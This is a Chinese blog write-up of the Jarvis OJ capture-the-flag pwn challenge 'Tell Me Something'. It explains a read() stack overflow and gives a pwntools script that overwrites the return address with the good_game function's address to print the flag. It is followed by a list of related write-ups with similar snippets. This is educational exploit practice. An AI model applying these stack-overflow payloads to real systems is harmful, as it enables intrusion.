(Jarvis Oj)(Pwn) Tell Me Something

最新推荐文章于 2021-12-08 23:11:27 发布
最新推荐文章于 2021-12-08 23:11:27 发布
阅读量1k 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/github_36788573/article/details/80690500
版权

(Jarvis Oj)(Pwn) Tell Me Something

首先查看程序开的保护。基本什么都没有。
这里写图片描述
丢到ida中,主函数。
这里写图片描述
然后发现了good_game函数。
这里写图片描述
这个函数的用途就显而易见了,输出目录下的”flag.txt”文件。于是利用read函数导致的栈溢出,将返回地址覆盖为good_game函数的地址。通过ida或者cyclic工具可以获得需要的填充的长度。写得脚本。

  1 from pwn import *
  2 
  3 context.terminal = ['gnome-terminal','-x','sh','-c']
  4 #conn=process("./guestbook")
  5 conn=remote("pwn.jarvisoj.com","9876")
  6 e=ELF("./guestbook")
  7 conn.recvline()
  8 game_addr=e.symbols["good_game"]
  9 payload="A"*0x88+p64(game_addr)
  10 #print payload
  11 conn.sendline(payload)
  12 conn.recvline()
  13 conn.interactive()
jarvisoj刷题之旅】pwn题目Tell Me Something的writeup
iqiqiya的博客
10-14 1025
题目信息: file一下  发现是64位的ELF checksec检查下安全性 objdump -t 文件名   可以查看符号表 iqiqiya@521:~/Desktop/jarvisOJ$ objdump -t guestbook guestbook: file format elf64-x86-64 SYMBOL TABLE: 00000000004002...
jarvisoj pwn level5 wp
zszcr的博客
03-26 2000
题目要求练习 mmap和mprotect 函数 不能调用system或者是execv函数来获取shell同时给了可执行文件和libc文件先查了下mmap和mprotect函数是干什么的两个函数原型如下:void* mmap(void* addr, size_t len, int port, int flag, int filedes, off_t off)#mmap(rdi=shellcode_a...
Jarvis OJ Tell Me Something
九层台
04-05 606
nc pwn.jarvisoj.com 9876 题目网址 https://www.jarvisoj.com/challenges 需要原料: python zio模块。 拿到程序名字太长了,改名成 1 用file命令查看文件类型 file 1 1: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically...
jarvisoj——Tell Me Something
王嘟嘟的博客
07-14 613
本来想做其他的平台,但是搜了一下还是这个平台比较适合入门。 题目 Wp 这里首先下载,然后ida打开,看到main函数 main函数说的实际上就是有一个保存的栈大小为136,但是确允许输入256栈大小的内容,这里存在栈溢出的问题。 然后这里可以看到有一个good_gaem 可以看到是读取了一个flag.txt的文件。 那么需要做的就是先覆盖,这里我自己感觉的是,覆盖先将自身拉满,然后加返回地址直接覆盖就行。 最后就是先覆盖136的自身,然后加上good_game的地址即可。 pwntools fro
BUUCTF:jarvisoj_tell_me_something(write up)
qq_44768749的博客
08-24 576
BUUCTF:jarvisoj_tell_me_something0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 仅开启了栈不可执行保护 0x02 运行 只是输入一条message 0x03 IDA good_game函数将flag.txt内容输出 0x04 思路 是一道简单的栈溢出题,知道覆盖长度即可,gdb调试 发现输入message的地址到返回地址的长度为0x88字节 0x05 exp #!/usr/bin/python
Jarvis oj tell me something writeup
ditto的博客
12-31 278
拿到题目前checksec下: 64位,开启了NX。 放到IDA里看下: 就单纯的栈溢出,看下调用哪些函数: plt表里并没有system函数,也不知道对方使用的动态库的版本。 看到函数good_game: 这个函数会读取flag,那么就很显然了,将返回地址覆盖到这个函数即可。 计算下溢出点: 由于是64位的程序,不能访问大于0x00007fffffffffff的地址空间。 但是可以通...
Jarvis OJ-PWN
weixin_45461609的博客
08-08 274
pwnTest_Your_Memory Test_Your_Memory 题目名字和题目没啥关系,真·一点关系也没有。 提供了system()函数 并且在mem_test函数中的输出hint的地址,hint地址内容为cat flag。 所以只需要将返回地址改成system()所在的地址,并将hint的地址传给system就能执行cat flag命令。 from pwn import * r=remote('pwn2.jarvisoj.com',9876) e=ELF('./memory') sys_a
Jarvis OJ pwn刷题
清霂的博客
03-26 270
目录level1level3level3_x64smashes level1 #!/usr/bin/env python3 from pwn import * context(os="linux", arch="i386", log_level="debug") content = 1 def main(): if content == 0: io = process("./level1.80eacdcd51aca92af7749d96efad7fb5") else:
(Jarvis Oj)(Pwn) Smashes
Nothing
06-14 2473
(Jarvis Oj)(Pwn) Smashes 查看保护。打开了栈保护。看上去有点麻烦。 再来分析下程序代码。如下是主要的函数体部分。 这个函数首先让我们输入name字符串,通过gets()函数,是有溢出的,但是在输入过长的字符串时程序会abort。 并且提示 ./smashes terminated 这里其实是ssp(Stack Smashing Protector)的提示...
Javris oj -pwn tell me something
hanqdi_的博客
02-04 612
pwn - tell me something 修改权限:chmod 777 guestbook 检查保护机制:checksec guestbook 64位文件,开启堆栈不可执行保护,不能往堆栈里写入shellcode解题。 用64位ida打开guestbook,找漏洞点 from pwn import * r=remote('pwn.jarvisoj.com',9876) pay...
18.9.19 Jarvis OJ PWN----Tell Me Something
qq_42192672的博客
09-19 218
我先checksec一下 可以栈溢出,发现主函数里的read函数就可以溢出 我们可以看到函数列表里还有个函数叫good_game 那直接覆盖然会地址就好啦 上脚本 #函数主体 cn.recvuntil("Input your message:\n") goodgame_addr=0x00400620 payload='a'*(0x88)+p64(goodgame_addr...
JarvisOJ-PWN-Tell_Something
杀生丸?不,其实我要的是桔梗
03-16 285
JarvisOJ-PWN-Tell_Something 首先,检查后是64位的gcc。 用IDA打开。 在Export发现这些函数: 这些函数一看就知道是自己写的函数了。 先看main 再看read。里的v4 可以看出v4内存空间为:0x88。 read 0x100>0x88,存在栈溢出漏洞。 那该怎么利用呢? 再看readmassage 可能也是...
jarvisoj pwn tell me something
Joey_l的博客
07-31 214
题目链接 https://www.jarvisoj.com/challenges 下载程序后,先file查看到文件为64位、动态链接 file guestbook 接着用checksec命令查看文件开启了哪些保护机制 checksec guestbook 用ida64打开程序,观察到main中的read函数存在溢出点,shift+F12可以看到有flag.txt文件,猜想程序中可能...
jarvisoj_tell_me_something
z1r0的博客
12-08 425
jarvisoj_tell_me_something 查看保护 有个栈溢出,程序结束没有leave,所以不需要对ebp进行覆盖。 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 29646) else: r = process(file_name)
jarvis oj pwn
qq_44813849的博客
07-24 242
先附上一段大佬的总结,接着再说题。 栈溢出的基本套路: 找到栈溢出地址(就是搞事情的地址),基本上都是buf的地址,这个地址需要用pwntools中的p32或p64进行转换,(若程序是32位的就用p32)才能用pwntools中的sendline发送到远程连接 构建shellcode,用一句话就行shellcode = asm(shellcraft.sh()) 构建payload,payload...
[Jarvis OJ - PWN]——Tell Me Something
Y_peak的博客
02-02 332
[Jarvis OJ - PWN]——Tell Me Something 题目地址:https://www.jarvisoj.com/challenges 题目:
[BUUCTF]PWN——jarvisoj_tell_me_something
mcmuyanga的博客
11-02 329
jarvisoj_tell_me_something 附件 步骤: 例行检查,64位程序,开启了NX保护 运行一下程序,看看程序的大概流程 64位ida载入,shift+f12检索程序里的字符串 看到了flag.txt关键子,双击跟进,找到了程序里的后门,flag_addr=0x400620 从main函数开始看程序 输入点的v4明显的溢出漏洞,利用它覆盖返回地址为flag_addr的地址读出flag 这边有一个注意点 看汇编发现这个程序的结尾处跟平常函数的结尾不一样没有leave 这道题
[JarvisOJ][pwn]Guess
九层台
07-01 883
练习了一个oj平台上的题,感觉收货很多,在这里记下来。 liu@liu-F117-F:~/桌面/oj/猜测$ checksec 1 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/\xe7\x8c\x9c\xe6\xb5\x8b/1' Arch: amd64-64-little RELRO: No RELRO Sta...
JarvisOJ:实战渗透挑战与信息获取技术
"JarvisOJ 是一个综合性的在线编程竞赛平台,提供了多种挑战环节以测试参赛者的技能。本文将介绍几个关键知识点: 1. JarvisOJ-WEB 部分:该部分强调了平台的安全性,特别是对访问控制的设置。题目要求使用特定端口...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值